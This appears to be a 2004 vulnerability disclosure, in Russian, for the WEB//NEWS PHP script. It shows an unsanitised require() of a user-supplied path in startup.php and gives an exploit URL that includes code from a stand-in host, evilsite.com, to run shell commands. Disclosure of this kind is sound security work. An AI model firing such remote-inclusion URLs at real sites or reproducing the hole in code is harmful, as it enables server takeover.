Related information

CGI bugs

[SECURITY] [DSA 471-1] New interchange packages fix information leak

CactuSoft CactuShop v5.x shopping cart software multiple security vulnerabilities

phpkit suffers (reale stupid) XSS vuln.

Exensive cPanel Cross Site Scripting

From:	Frontal Attack <x64rst_(at)_mail.ru>
Date:	02.04.2004
Subject:

продукт: WEB//NEWS Personal Newsmanagement -   2002-2004                      
производитель: Christian Scheb                                                
сайт: Stylemotion.de
Возможность удаленного выполнения команд
каталог modules. файл startup.php
...........................
/*** MODULES LOAD ***/
require($DIR."/modules/config.inc.php");
...........................
exploit:
http://www.site.com/webnews/modules/startup.php?DIR=http://evilsite.com&cmd=ls
где на evilsite.com создаем /modules/config.inc.php  

Обнаружил: 0x64rst